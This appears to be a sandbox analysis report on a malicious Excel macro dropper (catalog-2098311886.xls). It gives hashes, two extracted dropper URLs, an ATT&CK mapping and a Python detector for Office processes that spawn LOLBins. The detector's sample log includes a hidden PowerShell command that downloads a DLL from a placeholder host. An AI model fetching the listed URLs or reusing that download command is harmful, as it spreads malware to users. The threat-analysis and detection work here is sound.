General

  • Target

    catalog-2098311886.zip

  • Size

    50KB

  • Sample

    210513-6tl5s1dxx2

  • MD5

    28fe7c08c54da21db4a85a0ceea3ef9f

  • SHA1

    0f3973e4dda9ee5a691d22a2b34cade78aedcf47

  • SHA256

    ad00032538575c81384e45d1db94a63c3bf665966e9200025d5a046fa0b7c170

  • SHA512

    9525ad40dff7c81ef9bdc3d5cec4d755553383703bbdc7ad9346d1d7f36d1ecf4a2ade6a2a5a40e7c02ec99141289e5ffd69dd03cf5ca95135791eb0ba93d378

Score
10/10

Malware Config

Extracted

  Language   Source           URLs
  xlm4.0     xlm40.dropper    https://smartpalakatva.com/edQsUZOLlE/th.html
  xlm4.0     xlm40.dropper    https://pilstlcommodities.com/Ov4FlB3lpy/th.html

Targets

    • Target

      catalog-2098311886.xls

    • Size

      367KB

    • MD5

      39c5464d3ec35720cfd9ce17ffb21009

    • SHA1

      2e72fe2285328d15f7eebb633f3dc932791f66cc

    • SHA256

      59df78797744356567767df8ea3683dd1ff897dc15a90d35fb94fbf1f6f64a8d

    • SHA512

      44aabd54a04a2864c3a9c9e81c60957ad4ced61a2e5d13b07b72fbbac786c5666ce1f83137c6ef9065c491b205982ac46e2cd678aa11aff7085f6dc077464916

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
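The check behind the "Process spawned unexpected child process" signature, as an added example that is not part of this report and is not the sandbox's own detection logic: a small Python scanner run over constructed Sysmon-style process-creation events. The log lines, file paths and the example.invalid URL are constructed for illustration (they are not observations from this sample), and the lists of Office parents, LOLBin children and allowed children are assumptions a practitioner would tune to their own environment.

```python
"""Flag unexpected child processes of Office applications (added example).

Events are constructed, pipe-delimited Sysmon-like records (ParentImage, Image,
CommandLine); they are not taken from the sandbox run of this sample.
"""
import re

# Assumed Office parent processes whose children deserve scrutiny.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Assumed scripting hosts / LOLBins that a macro dropper typically launches.
LOLBIN_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe", "schtasks.exe", "wmic.exe",
}

# Children Office legitimately spawns (e.g. the print spooler proxy); keep narrow.
ALLOWED_CHILDREN = {"splwow64.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' if the path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Parse 'Key=Value|Key=Value' into a dict (first '=' splits each field)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def flag_event(event: dict):
    """Return a finding dict for an Office parent with an unexpected child, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child in ALLOWED_CHILDREN:
        return None
    urls = URL_RE.findall(event.get("CommandLine", ""))
    rule = "office_spawned_lolbin" if child in LOLBIN_CHILDREN else "office_spawned_unlisted_child"
    return {"parent": parent, "child": child, "urls": urls, "rule": rule}


def scan(lines) -> list:
    """Run flag_event over every non-empty log line; findings keep log order."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        hit = flag_event(parse_event(line))
        if hit:
            hits.append(hit)
    return hits


# Constructed sample events: benign Excel launch, allowed spooler child, two
# LOLBin children (one fetching a stage from a placeholder URL), and an
# unlisted child under Word.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine="EXCEL.EXE" C:\Users\user\Downloads\catalog-2098311886.xls
ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\splwow64.exe|CommandLine=C:\Windows\splwow64.exe 12288
ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 -s C:\Users\Public\stage.dll
ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -c "iwr https://example.invalid/th.html -o C:\Users\Public\a.dll"
ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"[{hit['rule']}] {hit['parent']} -> {hit['child']} urls={hit['urls']}")
```

The two-tier rule mirrors the report's wording: any child of an Office process that is not on the short allow list is "unexpected", and a scripting host or LOLBin child is the high-confidence variant. URLs pulled from the child's command line can be matched against the extracted-config URLs above to tie a host-side alert to this sample's configuration.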

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic            Technique                       Count   ID
  Defense Evasion   Modify Registry                 1       T1112
  Discovery         Query Registry                  2       T1012
  Discovery         System Information Discovery    2       T1082
